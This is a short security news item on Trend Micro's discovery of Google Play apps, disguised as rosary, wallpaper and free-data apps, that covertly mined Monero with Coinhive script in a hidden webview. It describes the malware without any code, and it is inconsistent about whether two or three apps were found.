Cryptocurrency mining code found in apps on Google Play

Trend Micro researchers have spotted two apps that have been equipped with cryptocurrency mining script.

Researchers at Trend Micro found three programs available for download in the application souk that were surreptitiously using the spare CPU cycles on people’s smartphones to mine Monero, using code built by  Coin Hive. The mining apps were variously disguised as a wallpaper collection, a wireless safety app, and software to help Catholics with rosary prayers.

coinhive-apps

The first (prsolutions.rosariofacileads) is an app that is meant to help users pray the rosary, the second one (com.freemo.safetyne) allows users to “earn free Talk, Text, and Data” by racking up credits “by redeeming local coupons and deals, watching videos, taking surveys and more.” , the third is a legitimate wallpaper app (com.yrchkor.newwallpaper) that has been modified to include a mining library.

“Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key,” the researchers explained.

“This JavaScript code runs within the app’s webview, but this is not visible to the user because the webview is set to run in invisible mode by default. When the malicious JavaScript code is running, the CPU usage will be exceptionally high.”

First two  apps have been pulled from Google Play, and the accounts of their developers have apparently been removed or suspended. They can still be downloaded from some third-party Android stores.

%d bloggers like this: